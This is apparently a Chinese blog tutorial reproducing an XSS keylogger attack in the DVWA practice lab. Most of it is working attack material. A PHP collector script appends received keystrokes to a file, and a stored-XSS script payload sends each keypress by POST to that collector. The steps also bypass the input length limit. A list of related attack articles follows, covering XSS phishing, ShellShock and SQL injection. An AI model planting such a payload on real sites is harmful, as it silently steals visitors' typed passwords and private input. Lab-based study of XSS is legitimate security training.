漏洞复现篇——利用XSS漏洞实现键盘记录
实验环境:
- PHPstudy
- 火狐浏览器、IE
- DVWA靶场
实验准备:
在www目录下创建一个名为keylog.php
的文件,代码如下:
<?php
$file = fopen("key.txt","a");
if(isset($_REQUEST['key'])) {$key = $_REQUEST['key'];fputs($file,$key);
}
?>
模拟实验:
1、把级别调成low,选择Stored储存型,打开F12将输入限制改为500
2、将下列代码输入执行,效果如下
<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>
3、然后随便输入什么东西,key.txt中就会出现记录,键盘记录器就做完了
漏洞复现篇——利用XSS漏洞实现键盘记录相关推荐
- 漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法
实验环境: PHPstudy 火狐浏览器 DVWA靶场 模拟实验: 重定向钓鱼 把当前页面重定向到一个钓鱼页面,例如重定向到百度,代码如下: <script>document.locati ...
- LINUX漏洞复现篇之ShellShock漏洞
简介 ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞 在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bas ...
- 利用XSS漏洞实现键盘记录器
利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 利用xss漏洞结合xss平台实现社工钓鱼
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...
- 【网络安全】如何使用ppmap检测和利用XSS漏洞
关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...
- html %3c 不给转义,八个无法利用XSS漏洞的场景
☝☝ 相信有很多的小盆友们曾经发现过一些疑似存在XSS漏洞的站点,但又无法完全证明这个漏洞是可以被利用的.此时的你可能处于怀疑状态,也有可能你已经验证到一半了,严重怀疑其有精神病(XSS漏洞)的情况. ...
- ms08_067,ms10_046漏洞复现与利用
ms08_067,ms10_046漏洞复现与利用 一:ms08_067 主机扫描 通过nessus扫描网段内存活的主机,发现192.168.206.142该靶机并且时xp而且开启了445端口,考虑使用 ...
- 怎样利用XSS漏洞在其它网站注入链接?
怎样利用XSS漏洞在其它网站注入链接? 什么是XSS攻击 怎样利用XSS漏洞在别人网站注入链接 XSS攻击注入的链接有效果吗? 对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而 ...
最新文章
- Android 调试 Release 包(debuggable)
- usaco2.1.2(frac1)
- linux 命令之电子书chm格式下载
- 实验一 简单词法分析程序设计
- 图论算法》关于SPFA和Dijkstra算法的两三事
- 【2017年第1期】CCF大专委2017年大数据发展趋势预测
- 程序员除了上班,还可以怎么赚钱?
- Convert Sorted List to Binary Search Tree ------C++ 递归创建平衡二叉查找树
- Linux 僵尸进程查杀
- MySQL - 查询今天的数据(以及昨天、本月、上个月、今年...)
- Java视频教程下载地址汇总
- 牛腩新闻发布--.NET控件FreeTextBox使用方法
- 软件专业大学生常用的刷题、找答案、找资源的网站
- 永磁同步电机矢量控制(六)——MTPA最大转矩电流比控制
- 阿里云 DataV 产品简介
- 英飞凌XC2000系列——汽车ECU Bootloader 设计详解
- Maven配置错误: The JAVA_HOME environment variable is not defined correctly
- 6个步骤教你用Python解数独!(含实例代码)
- KubeEdge Node not ready
- 怎么将视频配套讲义打印出来
热门文章
- 交叉编译cups-2.3.3
- 弦振动 matlab,弦振动规律及MATLAB数据处理
- 【搬运】射手播放器下载字幕存储位置及修改方法
- java企业级快速开发平台jeeadminlte(jeesite大胖老师修改版)
- ValueError: List argument ‘indices‘ to ‘Sparse Concat‘ Op with length 0 shorter than minimum length2
- mysql常用操作(二)
- 不再羡慕小说中的爱情...
- 原定7月30日上线的《暗黑破坏神:不朽》又又又”跳票“了,突发上线,如何在电脑上畅玩?
- python 推箱子实验开发报告,python实现推箱子游戏
- 有哪些权威的职业性格测试?职业性格测试靠谱吗?